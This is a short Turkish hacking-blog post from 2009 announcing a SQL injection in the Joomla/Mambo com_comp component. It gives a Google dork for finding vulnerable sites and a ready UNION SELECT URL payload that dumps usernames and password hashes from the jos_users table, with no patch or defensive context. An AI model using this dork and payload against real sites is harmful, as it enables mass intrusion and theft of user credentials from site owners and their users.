12 Aralık 2009 Cumartesi

Joomla / Mambo com_comp SQL İNJECTİON

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:index.php?option=com_comp

http:/localhost/index.php?option=com_comp&task=view_product&pid=13&cid=inj code. ??


http:/localhost/index.php?option=com_comp&task=view_product&pid=13&cid=-26 UNION SELECT 1,2,concat(username,0x3D,password),4,5,6,7 from jos_users

Hiç yorum yok :

Yorum Gönderme